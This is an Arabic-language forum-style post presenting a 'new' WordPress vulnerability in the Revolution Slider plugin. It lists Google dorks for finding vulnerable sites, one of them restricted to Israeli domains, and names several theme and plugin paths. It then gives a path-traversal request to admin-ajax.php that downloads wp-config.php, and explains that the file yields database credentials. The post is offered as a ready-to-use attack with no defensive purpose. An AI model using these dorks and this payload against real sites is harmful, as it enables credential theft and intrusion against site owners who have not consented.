حصريا : ثغرة wordpress 2016

السلام عليكم و رحمة الله تعالى و بركاته

اليوم انا معاكم بثغرة حديثة خاصة ب WordPress

نتوكل على الله

اولا الدوركات

inurl:wp-content
inurl:wp-content/themes/
inurl:wp-content inurl:revslider
inurl:wp-content in****:revslider.php
inurl:wp-content in****:revslider_front.php
inurl:wp-content in****:revslider.php site:il
themes/WP-Smartcheck
themes/stendhal
theme/templates/sliders
themes/RoyalOak
themes/celestino2
plugins/dnd-shortcodes
themes/incrediblewp
themes/celestino
plugins/meteor-extras
themes/bazar
themes/cheope
themes/aziza

الاستغلال

/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

الشرح

عند الاستغلال راح يتحمل عندنا ملف اسموا admin-ajax.php
وداخل الملف رح نلاقي 
بيانات قاعدة البيانات